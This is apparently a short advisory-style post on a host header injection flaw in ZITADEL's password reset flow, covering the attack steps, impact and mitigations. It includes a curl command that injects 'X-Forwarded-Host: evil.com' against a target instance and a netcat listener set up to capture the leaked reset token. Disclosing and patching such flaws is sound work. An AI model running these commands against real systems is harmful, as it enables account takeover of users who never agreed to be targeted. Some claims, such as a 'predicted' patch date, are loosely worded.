Listen to this Post
The vulnerability exploits the password reset mechanism’s reliance on the untrusted `Forwarded` and `X-Forwarded-Host` HTTP headers to dynamically construct the reset link’s base URL. When a user requests a password reset, ZITADEL’s backend code takes the host value from these headers to build the full confirmation URL, which includes a unique, secret token. This URL is then emailed to the user. An attacker can intercept the reset request and inject a malicious host header pointing to a server they control. The ZITADEL instance, trusting this header, generates a reset link directed to the attacker’s domain. When the user clicks the link in the email, their browser sends the secret token to the attacker’s server. The attacker captures this token and uses it on the legitimate ZITADEL site to complete the password reset process, thereby compromising the user’s account. This attack bypasses the standard security of the reset flow by subverting the link destination.
Platform: ZITADEL
Version: 2.x-4.x
Vulnerability: Host Header Injection
Severity: Critical
date: 2024-10-30
Prediction: Patch 2024-11-13
What Undercode Say:
curl -X POST "https://target.zitadel.cloud/ui/login/forgotpassword" -H "X-Forwarded-Host: evil.com" -d "[email protected]"
nc -lvnp 80 Logs incoming request with token: GET /ui/login/forgotpassword/confirm?userID=...&code=SECRET_TOKEN
How Exploit:
- Attacker initiates a password reset for a victim.
- Attacker intercepts the request and injects a malicious `X-Forwarded-Host` header.
3. ZITADEL generates a poisoned reset link.
- Victim receives the email and clicks the malicious link.
5. Attacker’s server logs the secret token.
- Attacker uses the token to reset the victim’s password.
Protection from this CVE
- Upgrade to patched versions.
- Configure reverse proxy to strip
Forwarded/X-Forwarded-Hostheaders. - Implement MFA universally.
Impact:
- Account takeover.
- Bypass of password authentication.
- Full system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

